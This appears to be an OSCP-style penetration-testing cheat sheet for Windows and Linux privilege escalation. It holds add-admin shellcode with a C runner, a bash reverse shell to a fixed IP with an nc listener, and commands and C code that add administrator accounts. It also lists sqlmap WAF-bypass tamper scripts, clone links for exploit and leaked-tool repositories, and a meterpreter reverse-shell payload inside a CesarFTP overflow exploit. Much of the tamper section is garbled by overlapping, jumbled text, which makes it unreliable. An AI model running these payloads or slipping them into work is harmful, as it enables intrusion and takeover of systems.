CheatSheets OSCP

Add Admin User Shellcode (194 bytes) - Any Windows Version
-----------------
Title: Add Admin User Shellcode (194 bytes) - Any Windows Version
Tested on: Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3
Username: BroK3n
Password: BroK3n
-----------------
char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03
\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b
\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a
\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf
\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f
\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69
\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63
\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44
\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33
\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65
\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63
\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7;
int main(int argc, char **argv){int (*f)();f = (int (*)())shellcode;(int)(*f)();}

immediately this can still give short window to an attacker to exploit a vulnerability and
escalate his privileges inside a system and therefore inside the network.
This article will discuss how to identify missing patches related to privilege escalation
and the necessary code to exploit the issue.
Discoveryorofautomatic.
methods Missing Patches
Manually this can be done easily be executing the following
command which will enumerate all the installed patches.
$ wmic qfe get Caption,Description,HotFixID,InstalledOn
The output will be similar to this:

missing patches related to privilege escalation. As the focus is on privilege escalation
the command can be modified slightly to discover patches based on the KB number.
$ wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3136041"
/C:"KB4018483"
Alternatively this can be done automatically via Metasploit, Credential Nessus Scan or
via a custom script that will look for missing patches related to privilege escalation.
Metasploit
the Knowledge Base number and specifically patches for which there is a Metasploit
module.
$ post/windows/gather/enum_patches
Windows Exploit Suggester

and can be used to identify those exploits that could lead to privilege escalation. The
only requirement is that requires the system information from the target.
PowerShell
Sherlock(https://github.com/rasta-mouse/Sherlock) and it will check a system for the
following:
MS10-015 : User Mode to Ring (KiTrap0D)

MS10-092 : Task Scheduler
MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
MS13-081 : TrackPopupMenuEx Win32k NULL Page
MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
MS15-051 : ClientCopyImage Win32k
MS15-078 : Font Driver Buffer Overflow
MS16-016 : ‘mrxdav.sys’ WebDAV
MS16-032 : Secondary Logon Handle
CVE-2017-7199 : Nessus Agent 6.6.2 – 6.10.3 Priv Esc
Privilege
The Escalation
following Table
table has been compiled to assist in the process of privilege escalation
due to lack of sufficient patching.
Operating System
Windows Server 2016
Windows Server 2008 ,7,8,10 Windows Server 2012
Windows Server 2008, Vista, 7
Windows Server 2003, Windows Server 2008, Windows 7, Windows 8, Windows 2012
Windows Server 2003, Windows Server 2008, Windows Server 2012, 7, 8
Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012
Windows XP, Windows Server 2003
Windows Server 2008, 7
Windows Server 2003, Windows Server 2008, 7, XP
Windows Server 2003, XP
Description Security Bulletin KB
Windows Kernel Mode Drivers MS16-135 3199135
Secondary Logon Handle MS16-032 3143141
WebDAV MS16-016 3136041
Windows Kernel Mode Drivers MS15-051 3057191
Win32k.sys MS14-058 3000061
AFD Driver MS14-040 2975684
Windows Kernel MS14-002 2914368
Kernel Mode Driver MS13-005 2778930
Task Scheduler MS10-092 2305420
KiTrap0D MS10-015 977165
NDProxy MS14-002 2914368
Kernel Driver MS15-061 3057839
AFD.sys MS11-080 2592799
NDISTAPI MS11-062 2566454
RPC MS15-076 3067505
Hot Potato MS16-075 3164038
Kernel Driver MS15-010 3036220
AFD.sys MS11-046 2503665
Exploit
Exploit
Github
ExploitDB
Metasploit
Github
ExploitDB
Metasploit
ExploitDB
Metasploit
ExploitDB
Github
Metasploit
ExploitDB
GitHub
Metasploit
ExploitDB
GitHub
Metasploit
ExploitDB
Github
Github
Metasploit
ExploitDB
ExploitDB
Github
PowerShell
HotPotato
GitHub
ExploitDB
EXE
ExploitDB
############LINUX#####################
research the target machine on linux
using uname -a determine the kernel and see if there is a know privilege escalation
www.exploit-db.com/exploits/18411/
download in target machine --- notes potential machine ip ends with 240
compile
gcc exploit.c -o exploit
run it done ;D you got root privileges
read the lab guide for more references video 82
SEARCHIVNG FOR SERVICES WITH MISCONFIGURE PERMISSION

#run this command to find said services aka file with root privileges and read and writable by low priv user
find / -perm -2 ! -type l -ls 2>/dev/null
#modify said script to run the following command that establishes a reverse shell to your machine
bash -i >& /dev/tcp/192.168.13.220/443 0>&1
#setup a listener in your machine nc -lvp 443
nc -lvp 443
sometimes escalation priviliges

relies in files that contain password
group policiy config files
unatended installation
or badly wrriten scripts that contain password in it
###############WINDOWS#####################
notes on privilege escalation in windows
ms011 this bug is classic example user mode to windows kernel with uncheckbuffer overwrite kernel space.
gain system level execution windows xp and windows 2003 32bit and 64.
python exploit
www.exploit-db.com/exploits/18176/
install the dependencies needed in the tools directory aka py installer and other file in tools folder
then copy the exploit to that folder and compile
python pyinstaller.py --onefile ms11-080.py

create it into an exe in case you dont have python libraries install
login to a 2k3
check to see if you have admin priviliges after executing it by using:
whoami
create a new windows user

net user hacker hacker /add
net localgroup administrators hacker /add #add to administators group
updates reduce
adminstrative error
mishandling file and folder user permission allow privilege ecalation
windows service
doesn't take care file permission full and read and write access to service
the malicious file executed with system privilege
#lab example
net user lowpriv mypass /add
net localgroup "Remote Desktop users" lowpriv /add
check a services.msc
services.smc
integrity controlist
icacls on the service exe
to check if the services is Everyone and Administrators
scsiaccess.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Everyone:(CI)(F)
abuse this by running c program using the linux crosscompiler
//compilethiscode i586-mingw32msvc-gcc useradd.c -o useradd.exe

//useradd.c
#include <stdlib.h>
int main()
{
int i;
i=system("net localgroup administrators lowpriv /add");
i=system("net user hacker hacker /add");
i=system("net localgroup administrators hacker /add");
i=system("net localgroup \"Remote Desktop users\" hacker /add");
return 0;
}
by low priv user
rite kernel space.

SQLMAP DEFAULT TAMPER SCRIPTS
TAMPER SCRIPT REQUERIMENTS / TESTED against
apostrophemask UNIVERSAL \ NOT DESCRIBED
apostrophenullencode UNIVERSAL \ NOT DESCRIBED
appendnullbyte Microsoft Access \ TEST FURTHER
base64encode UNIVERSAL \ NOT DESCRIBED
Microsoft SQL Server 2005
between
between MySQL 4
between MySQL 5.0
between Oracle 10g
between PostgreSQL 8.3
between MySQL 5.5
bluecoat MySQL 5.1
bluecoat SGOS
chardoubleencode UNIVERSAL \ NOT DESCRIBED
charencode Microsoft SQL Server 2005
charencode MySQL 4
charencode MySQL 5.0
charencode MySQL 5.5
charencode Oracle 10g
charencode PostgreSQL 8.3
charunicodeencode ASP
charunicodeencode ASP.NET
charunicodeencode Microsoft SQL Server 2000
charunicodeencode
charunicodeencode MySQL 5.1.56
charunicodeencode PostgreSQL 9.0.3
charunicodeescape UNIVERSAL \ NOT DESCRIBED
commalesslimit MySQL
commalesslimit MySQL 5.0
commalesslimit MySQL 5.5
commalessmid MySQL
commalessmid MySQL 5.0
commalessmid MySQL 5.5
commentbeforeparentheses Microsoft SQL Server
commentbeforeparentheses MySQL
commentbeforeparentheses Oracle
commentbeforeparentheses PostgreSQL
concat2concatws MySQL
concat2concatws MySQL 5.0
equaltolike
equaltolike MySQL 4
equaltolike MySQL 5
equaltolike MySQL 5.5
escapequotes UNIVERSAL \ NOT DESCRIBED
greatest MySQL 4
greatest MySQL 5
greatest MySQL 5.5
greatest Oracle 10g
greatest PostgreSQL 8.3
halfversionedmorekeywords MySQL < 5.1
halfversionedmorekeywords MySQL 4.0.18
halfversionedmorekeywords MySQL 5.0.22
htmlencode UNIVERSAL \ NOT DESCRIBED
ifnull2ifisnull MySQL 5.0
ifnull2ifisnull MySQL 5.5
informationschemacomment UNIVERSAL \ NOT DESCRIBED
least MySQL 4
least MySQL 5
least MySQL 5.5
least Oracle 10g
least PostgreSQL 8.3
lowercase
lowercase MySQL 4
lowercase MySQL 5.0
lowercase MySQL 5.5
lowercase Oracle 10g
lowercase PostgreSQL 8.3
modsecurityversioned MySQL
modsecurityversioned MySQL 5.0
multiplespaces UNIVERSAL \ NOT DESCRIBED
nonrecursivereplacement UNIVERSAL \ NOT DESCRIBED
overlongutf8 UNIVERSAL \ NOT DESCRIBED
percentage ASP
percentage Microsoft SQL Server 2000
percentage
percentage MySQL 5.1.56
percentage MySQL 5.5.11
percentage PostgreSQL 9.0
plus2concat Microsoft SQL Server 2012
plus2concat Microsoft SQL Server 2012+
plus2fnconcat Microsoft SQL Server 2008
plus2fnconcat Microsoft SQL Server 2008+
randomcase
randomcase MySQL 4
randomcase MySQL 5
randomcase MySQL 5.5
randomcase Oracle 10g
randomcase PostgreSQL 8.3
randomcomments UNIVERSAL \ NOT DESCRIBED
securesphere UNIVERSAL \ NOT DESCRIBED
sp_password MSSQL
space2comment
space2comment MySQL 4
space2comment MySQL 5
space2comment MySQL 5.5
space2comment Oracle 10g
space2comment PostgreSQL 8.3
space2dash MSSQL
space2dash SQLite
space2hash MySQL
MySQL 4.0
space2hash
MySQL 5.0
space2hash
space2morecomment MySQL 5.0
space2morecomment MySQL 5.5
space2morehash MySQL >= 5.1.13
space2morehash MySQL 5.1.41
space2mssqlblank Microsoft SQL Server
space2mssqlblank Microsoft SQL Server 2000
space2mssqlblank
space2mssqlhash MSSQL
space2mssqlhash MySQL
space2mysqlblank MySQL
space2mysqlblank MySQL 5.1
space2mysqldash MySQL
space2mysqldash MSSQL
space2plus UNIVERSAL \ NOT DESCRIBED
space2randomblank
space2randomblank MySQL 4.0
MySQL 5.0
space2randomblank
MySQL 5.5
space2randomblank
symboliclogical UNIVERSAL \ NOT DESCRIBED
unionalltounion UNIVERSAL \ NOT DESCRIBED
unmagicquotes UNIVERSAL \ NOT DESCRIBED
uppercase Microsoft SQL Server 2005
MySQL 4.0
uppercase
MySQL 5.0
uppercase
uppercase MySQL 5.5
uppercase PostgreSQL 8.3
varnish UNIVERSAL \ NOT DESCRIBED
versionedkeywords MySQL
versionedkeywords MySQL 4.0.18
versionedmorekeywords MySQL >= 5.1.13
versionedmorekeywords MySQL 5.1.56
versionedmorekeywords MySQL 5.5.11
xforwardedfor UNIVERSAL \ NOT DESCRIBED
SQLMAP DEFAULT TAMPER SCRIPTS USAGE
NOTES \ TIPS
Replaces apostrophe character with its UTF-8 full width counterpart
Replaces apostrophe character with its illegal double unicode
counterpart
Useful to bypass weak web application firewalls when the back-end
database management
Base64 encode systeminisa Microsoft
all characters Access - further uses are
given payload
Replaces space character after SQL statement with a valid random

blank character.
Replaces Afterwards
space character replace
after character with
SQL statement = witha valid
LIKE operator
random
blank character. Afterwards replace character = with LIKE
Double url-encodes all characters in a given payload (not processingoperator
already
Useful toencoded) * Useful
bypass very weaktowebbypass some weak
application web that
firewalls application
do not url-
decode the request before processing it through their ruleset.
Useful to bypass very weak web application firewalls that do not Theurl-
Useful to bypass very weak web application firewalls that do not url- The
decode
Useful tothe request
bypass verybefore
weak processing it through
web application theirthat
firewalls ruleset. The
do not url-
decode
bypass verybefore
do not url-
decode
bypass verybefore
do not url-
Useful to bypass weak web application firewalls that do not unicode The
url-decode the request
Useful to bypass before
weak web processing
application it through
firewalls that their
do notruleset
unicode
weak web processing
do notruleset
unicode
url-decode the request before processing it through their
Useful to bypass weak web application firewalls that do not unicode ruleset
weak web processing
do notruleset
unicode
url-decode the request before processing it through their
Useful to bypass weak web application firewalls that do not unicode ruleset
Useful to bypass before processing
weak filtering and/or WAFs it through
in JSON their ruleset
contexes,
Unicode-escapes
Replaces instances non-encoded
like 'LIMIT M, characters in a given
N' with 'LIMIT payload
N OFFSET M' (not
Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'
Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'
Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'
Useful to bypass web application firewalls that block usage of function
calls
calls
calls
calls
Useful to bypass very weak and bespoke web application firewalls that
filter
Usefultheto CONCAT() function
bypass very weak and bespoke web application firewalls that
Useful to bypass weak and bespoke web application firewalls that filter the equal character ('=') The LIKE operator is SQL stan
filter the CONCAT() function
Slash escape quotes (' and ")

Replaces greater than operator ('>') with 'GREATEST' counterpart. Useful to bypass weak and bespoke web application firewa
Adds versioned MySQL comment before each keyword. Useful to
bypass several web
Adds versioned MySQLapplication
comment firewalls
before when the back-end
each keyword. database
Useful to
bypass several web application firewalls when the back-end
Adds versioned MySQL comment before each keyword. Useful to database
bypass several(using
HTML encode web application
code points)firewalls when the back-end
all non-alphanumeric database
characters
Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' Useful
to bypassinstances
Replaces very weaklike
and'IFNULL(A,
bespoke web application
B)' with firewalls
'IF(ISNULL(A), that
B, A)' filter
Useful
to bypass
Add very weak
a comment and
to the end bespoke web application
of all occurrences firewalls that filter
of (blacklisted)
"information_schema" identifier
Useful to bypass weak and bespoke web application firewalls that filter the greater than character. The LEAST clause is a wide
Useful to each
Replaces bypass weak and
keyword bespoke
character web
with application
lower firewalls
case value. Usefulthat
to filter
bypassthevery
greater
weakthan
and character.
bespoke webTheapplication
LEAST clause is a wide
firewalls th
Replaces each keyword character with lower case value. Useful to bypass very weak and bespoke web application firewalls th
Embraces complete query with versioned comment. Useful to bypass

ModSecurity WAF/IDS
Useful to bypass ModSecurity WAF/IDS
Adds multiple spaces around SQL keywords. Useful to bypass very
weak and bespoke web application firewalls that has poorly written
Replaces predefined SQL keywords with representations suitable for
replacement (e.g. .replace("SELECT",
Converts all characters "")) filters.
in a given payload Useful to bypass
(not processing alreadyvery
encoded) Reference:
Adds a percentage sign ('%') infront of each character. Useful to
bypass weak and bespoke
Adds a percentage sign ('%') web application
infront of eachfirewalls
character. Useful to
bypass weak and bespoke web application firewalls
Adds a percentage sign ('%')web application
Adds a percentage sign ('%')web application
Replaces plus ('+') character with function CONCAT(). Useful in case
('+') character
Replaces is filtered.
plus ('+') character with function CONCAT(). Useful in case
('+') character is filtered.
Replaces plus ('+') character with ODBC function {fn CONCAT()}. Useful
in case ('+')
Replaces character
plus is filtered
('+') character with ODBC function {fn CONCAT()}. Useful
in case ('+') character is filtered
Add random comments to SQL keywords.

Appends special crafted string. Useful for bypassing Imperva SecureSphere WAF. Reference: http://seclists.org/fulldisclosure
Appends 'sp_password' to the end of the payload for automatic
obfuscation from
Replaces space DBMS logs.
character Appending
(' ') with commentssp_password to the
'/**/' Useful end of
to bypass
weak andspace
Replaces bespoke web application
character firewalls '/**/' Useful to bypass
(' ') with comments
weak andspace
(' ') with comments
weak andspace
(' ') with comments
weak andspace
(' ') with comments
weak andspace
(' ') with comments
weak and bespoke web application firewalls '/**/' Useful to bypass
Replaces space character (' ') with comments
weak andspace
(' ') with comments
weak andspace
character (' ') with afirewalls
dash comment ('--') followed by a
Replaces space character (' ') with
random string and a new line ('\n').a Useful
dash comment
to bypass('--') followed
several web by a random string and a new line ('\n').
Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n'). Useful to bypass
Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n'). Useful to bypass
Replaces space
Replaces space character
character ('
(' ')
') with
with comments
a pound character ('#')
'/**_**/' followed
Useful by a random
to bypass string
weak and and a web
bespoke new application
line ('\n'). Useful to bypass
firewalls
Replaces space character (' ') with comments '/**_**/' Useful to bypass weak and bespoke web application firewalls
Replaces space character (' ') with a pound character ('#') followed by
aUseful
random string and
to bypass a new
several web line ('\n')
application firewalls. Used during the
Replaces space character (' ') with
ModSecurity SQL injection challenge a random blank character from a valid set of alternate characters.
Replaces space character (' ') with a random blank character from a valid set of alternate characters.
Replaces space character (' ') with a pound character ('#') followed by a new line ('\n'). Useful to bypass several web applicati
Replaces space
Replaces space character
character ('
(' ')
') with
with aa random
pound character ('#') followed
blank character from aby a new
valid set line ('\n'). Useful
of alternate to bypass several web applicati
characters.
Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n'). Useful to bypass several web applicatio
Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n'). Useful to bypass several web applicatio
Replaces space character (' ') with plus ('+'). Is this any useful? The plus get's url-encoded by sqlmap engine invalidating the q
Replaces AND and OR logical operators with their symbolic

counterparts (&&ALL
Replaces UNION andSELECT
||) with UNION SELECT
Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work).
Replaces each keyword character with upper case value. Useful to bypass very weak and bespoke web application firewalls th
Append a HTTP header 'X-originating-IP' to bypass WAF Protection of

Varnish
EnclosesFirewall Reference: http://h30499.www3.hp.com/t5/Fortify-
each non-function keyword with versioned MySQL comment.
Useful to bypass several web application
Encloses each non-function keyword withfirewalls when
versioned the back-end
MySQL comment.
Useful to bypass several web application firewalls when the back-end
Encloses each non-function keyword with versioned MySQL comment.
Useful toeach
Encloses bypass several webkeyword
non-function application
withfirewalls when
versioned the back-end
MySQL comment.
Useful to bypass several web application firewalls when the
Encloses each keyword with versioned MySQL comment. Useful to back-end
bypass
Enclosesseveral web application
each keyword firewallsMySQL
with versioned when comment.
the back-end database
Useful to
bypass several web application firewalls when the back-end
Encloses each keyword with versioned MySQL comment. Useful to database
bypass
Appendseveral web application
a fake HTTP firewalls when the
header 'X-Forwarded-For' back-end database
to bypass
WAF (usually application based) protection
INJECT EXAMPLE
>>> tamper("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
>>> tamper("1 AND '1'='1")
'1 AND
>>>%00%271%00%27=%00%271'
tamper('1 AND 1=1')
'1 ANDAND
>>> tamper("1' 1=1%00'
SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN
>>> tamper('1 AND A >0B--')
AND B--'
AND B--'
AND B--'
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A > B--')
AND B--'
AND B--'
AND B--'
'1 AND A NOT
>>> tamper('SELECT BETWEEN
id FROM 0 AND
users WHEREB--'id = 1')
'SELECT%09id
>>> FROM%09users
tamper('SELECT WHERE%09id
id FROM users WHERE idLIKE= 1')1'
'SELECT%09id FROM%09users
>>> tamper('SELECT WHERE%09id LIKE 1'
FIELD FROM%20TABLE')
'%2553%2545%254C
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C
'%53%45%4C%45%43%54%20%46%49%45%4C
'%53%45%4C%45%43%54%20%46%49%45%4C
'%53%45%4C%45%43%54%20%46%49%45%4C
'%53%45%4C%45%43%54%20%46%49%45%4C
'%53%45%4C%45%43%54%20%46%49%45%4C
'%53%45%4C%45%43%54%20%46%49%45%4C
'%53%45%4C%45%43%54%20%46%49%45%4C
>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C
'%u0053%u0045%u004C
'%u0053%u0045%u004C
'%u0053%u0045%u004C
'%u0053%u0045%u004C
'%u0053%u0045%u004C
>>> tamper('SELECT FIELD FROM TABLE')
'\\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\
>>> tamper('LIMIT 2, 3')
>>> 'LIMIT 3 OFFSET2,2'3')
tamper('LIMIT
'LIMIT 3 OFFSET 2' 1, 1)')
>>> tamper('MID(VERSION(),
>>>'MID(VERSION() FROM 1 FOR
tamper('MID(VERSION(), 1)'
1, 1)')
>>>'MID(VERSION() FROM 1 FOR
tamper('MID(VERSION(), 1)'
1, 1)')
'MID(VERSION() FROM
>>> tamper('SELECT 1 FOR 1)'
ABS(1)')
'SELECT ABS/**/(1)'
>>> tamper('SELECT ABS(1)')
'SELECT ABS/**/(1)'
'SELECT ABS/**/(1)'
'SELECT ABS/**/(1)'
>>> tamper('CONCAT(1,2)')
'CONCAT_WS(MID(CHAR(0),0,0),1,2)'
>>> tamper('CONCAT(1,2)')
'CONCAT_WS(MID(CHAR(0),0,0),1,2)'
>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM
>>> tamper('SELECT users WHERE
* FROM id LIKE id=1')
users WHERE 1'
'SELECT * FROM
users WHERE 1'
'SELECT * FROM
users WHERE 1'
'SELECT * FROM users
>>> tamper('1" ANDWHERE id LIKE 1'
SLEEP(5)#')
>>>'1\\\\" AND AND
tamper('1 SLEEP(5)#'
A > B')
'1 AND GREATEST(A,B+1)=A'
>>> tamper('1 AND A > B')
'1 AND
>>> GREATEST(A,B+1)=A'
tamper('1 AND A > B')
'1 AND
'1 AND
>>> tamper("value' UNION ALL SELECT
CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_US
>>> tamper("1' AND SLEEP(5)#")
'1' AND SLEEP(5)#'
>>> tamper('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'2)')
>>> tamper('IFNULL(1,
'IF(ISNULL(1),2,1)'
>>> tamper('SELECT table_name FROM
INFORMATION_SCHEMA.TABLES')
'1 AND
>>> LEAST(A,B+1)=B+1'
'1 AND LEAST(A,B+1)=B+1'
'1 AND
>>> LEAST(A,B+1)=B+1'
'1 AND
>>> LEAST(A,B+1)=B+1'
'1>>>
ANDtamper('INSERT')
LEAST(A,B+1)=B+1'
'insert'
>>> tamper('INSERT')
'insert'
'insert'
'insert'
'insert'
'insert'
'insert'
'insert'
>>> import random
>>> random.seed(0)
>>> import random
>>>random.seed(0)
>>> random.seed(0)
>>> tamper('1 UNION SELECT foobar')
>>> random.seed(0)
>>> tamper('1
>>> tamper('SELECT FIELDUNION
FROM SELECT 2--') 2>1')
TABLE WHERE
'SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE
>>> tamper('SELECT FIELD FROM TABLE')
'%S%E%L%E%C%T %F%I%E%L%D
>>> tamper('SELECT FIELD%F%R%O%M
FROM TABLE')%T%A%B%L
>>>'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L
tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM
DUAL')
>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM
DUAL')
DUAL')
DUAL')
>>> import random
>>> random.seed(0)
>>> import random
>>>import
>>> random.seed(0)
random
>>> random.seed(0)
>>> import random
>>>import
>>> random.seed(0)
random
>>> random.seed(0)
>>> import random
>>>import
>>> random.seed(0)
random
>>> random.seed(0)
>>> import random
>>> random.seed(0)
>>> tamper('1 AND 1=1')
"1 AND 1=1 and
>>> tamper('1 '0having'='0having'"
AND 9227=9227-- ')
>>> tamper('SELECT id sp_password'
'1 AND 9227=9227-- FROM users')
'SELECT/**/id/**/FROM/**/users'
>>> tamper('SELECT id FROM users')
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
>>> random.seed(0)
>>>>>> tamper('1 AND
tamper('SELECT id 9227=9227')
FROM users')
'SELECT/**_**/id/**_**/FROM/**_**/users'
'SELECT/**_**/id/**_**/FROM/**_**/users'
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
>>> random.seed(0)
>>> random.seed(0)
>>> random.seed(0)
>>>
>>>tamper('SELECT
tamper('1 AND id FROM users')
9227=9227')
'1%23%0AAND%23%0A9227=9227'
>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
>>> random.seed(0)
>>> random.seed(0)
>>>tamper('1
tamper('SELECT id FROM users')
AND 9227=9227')
'1--%0AAND--%0A9227=9227'
tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
'SELECT+id+FROM+users'
>>> random.seed(0)
>>> random.seed(0)
>>> random.seed(0)
>>> random.seed(0)
>>>>>>
tamper('SELECT
tamper("1 AND id FROM
'1'='1")users')
"1 %26%26 '1'='1"
>>> tamper('-1 UNION ALL SELECT')
'-1 UNION AND
>>> tamper("1' SELECT'
1=1")
'1%bf%27-- '
>>> tamper('insert')
'INSERT'
'INSERT'
'INSERT'
'INSERT'
'INSERT'
'INSERT'
'INSERT'
>> X-forwarded-for: TARGET_CACHESERVER_IP
(184.189.250.X)
>>> tamper('1 UNION ALL SELECT NULL, NULL,
git clone https://github.com/ngalongc/AutoLocalPrivilegeEscalation.git -
git clone https://github.com/AlessandroZ/BeRoot/releases.git -
git clone https://github.com/raffaele-forte/climber.git -
git clone https://github.com/gbonacini/CVE-2016-5195.git -
git clone https://github.com/ASRTeam/CVE-2016-5195.git -
git clone https://github.com/kasif-dekel/evilsudo.git -
git clone https://github.com/hfiref0x/UACME.git -
git clone https://github.com/Cn33liz/TpmInitUACBypass.git -
git clone https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC.gi -
git clone https://github.com/FuzzySecurity/PowerShell-Suite.git -
git clone https://github.com/FuzzySecurity/Unix-PrivEsc.git -
git clone https://github.com/byt3bl33d3r/CrackMapExec.git -
git clone https://github.com/foxglovesec/Potato.git -
git clone https://github.com/L3cr0f/DccwBypassUAC.git -
git clone https://github.com/enddo/awesome-windows-exploitation.git -
git clone https://github.com/1135/EquationExploit.git -
git clone https://github.com/xairy/kernel-exploits.git -
git clone https://github.com/clymb3r/Misc-Windows-Hacking.git -
git clone https://github.com/opsxcq/exploit-CVE-2017-7494.git -
git clone https://github.com/tresacton/exploits.git -
git clone https://github.com/offensive-security/exploit-database-bin-sploits.git -
git clone https://github.com/offensive-security/exploit-database.git -
git clone https://github.com/rlarabee/exploits.git -
git clone https://github.com/dyntopia/exploits.git -
git clone https://github.com/WindowsExploits/Exploits.git -
git clone https://github.com/SecWiki/linux-kernel-exploits.git -
git clone https://github.com/SecWiki/windows-kernel-exploits.git -
git clone https://github.com/edwardz246003/IIS_exploit.git -
git clone https://github.com/lochv/exploit/tree/master/ms17-010.git -
git clone https://github.com/ohnozzy/Exploit.git -
git clone https://github.com/huntcve/exploit.git -
git clone https://github.com/cloudsec/exploit.git -
git clone https://github.com/myjohnson062843/MS17-010.git -
git clone https://github.com/juansacco/exploitpack.git -
git clone https://github.com/saelo/cve-2014-0038.git -
git clone https://github.com/mazen160/struts-pwn.git -
git clone https://github.com/nixawk/labs.git -
git clone https://github.com/misterch0c/shadowbroker.git -
git clone https://github.com/x0rz/EQGRP_Lost_in_Translation.git -
git clone https://github.com/adamcaudill/EquationGroupLeak.git -
git clone https://github.com/XiphosResearch/exploits.git -
git clone https://github.com/abatchy17/WindowsExploits.git -
git clone https://github.com/AusJock/Privilege-Escalation.git -
ftp id: ftp:ftp find with debug machine
Get jmp esp:
view jmp_esp.png
create payload:
root@St0rn:~/Desktop# msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.23.10 LPORT=444 R | ms

[-] cmd/powershell_base64 failed: Encoding failed due to a bad character (index=245, char=0x2f)
[*] x86/shikata_ga_nai succeeded with size 120 (iteration=1)
buf = ""
buf += "\xbe\x91\xab\x8d\xbd\xdb\xd9\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x18\x83\xed\xfc\x31\x75\x0f\x03\x75\x9e\x49"
buf += "\x78\x41\x91\x56\xe7\x31\x92\x58\x63\x05\x18\x12\x23"
buf += "\x9a\xab\x36\x4f\xd0\x8b\x9b\xe2\x5b\xc8\xe5\xc1\x51"
buf += "\xfd\xb6\x0b\xe3\xee\xc2\x06\x03\x7b\x91\xea\x98\x37"
buf += "\x1f\x6b\x14\x8b\x12\x97\x2b\xfa\xa6\xe6\x73\xfd\x50"
buf += "\x63\xf2\xc1\xa1\x9a\xf6\x50\xae\x31\x93\xa3\xc4\xb7"
buf += "\x9c\x73\x8f\xd0\xa2\xdb\xa7\x2a\x4b\x19\xc8\x2b\x37"
buf += "\x94\x29\x78\xf0\xaa\xfa\x2e\xa9\xe3\x96\xc0\x04\x54"
buf += "\x31\x1e\x43"
Modify exploit:
#!/usr/bin/python
#CesarFtp 0.99g 0day Exploit
#Proof of Concept: execute calc.exe
#Tested on XP sp2 polish
#Bug found by h07 [h07@interia.pl]
#Date: 10.06.2006
from socket import *

import sys
buf = ""
buf += "\xbe\x91\xab\x8d\xbd\xdb\xd9\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x18\x83\xed\xfc\x31\x75\x0f\x03\x75\x9e\x49"
buf += "\x78\x41\x91\x56\xe7\x31\x92\x58\x63\x05\x18\x12\x23"
buf += "\x9a\xab\x36\x4f\xd0\x8b\x9b\xe2\x5b\xc8\xe5\xc1\x51"
buf += "\xfd\xb6\x0b\xe3\xee\xc2\x06\x03\x7b\x91\xea\x98\x37"
buf += "\x1f\x6b\x14\x8b\x12\x97\x2b\xfa\xa6\xe6\x73\xfd\x50"
buf += "\x63\xf2\xc1\xa1\x9a\xf6\x50\xae\x31\x93\xa3\xc4\xb7"
buf += "\x9c\x73\x8f\xd0\xa2\xdb\xa7\x2a\x4b\x19\xc8\x2b\x37"
buf += "\x94\x29\x78\xf0\xaa\xfa\x2e\xa9\xe3\x96\xc0\x04\x54"
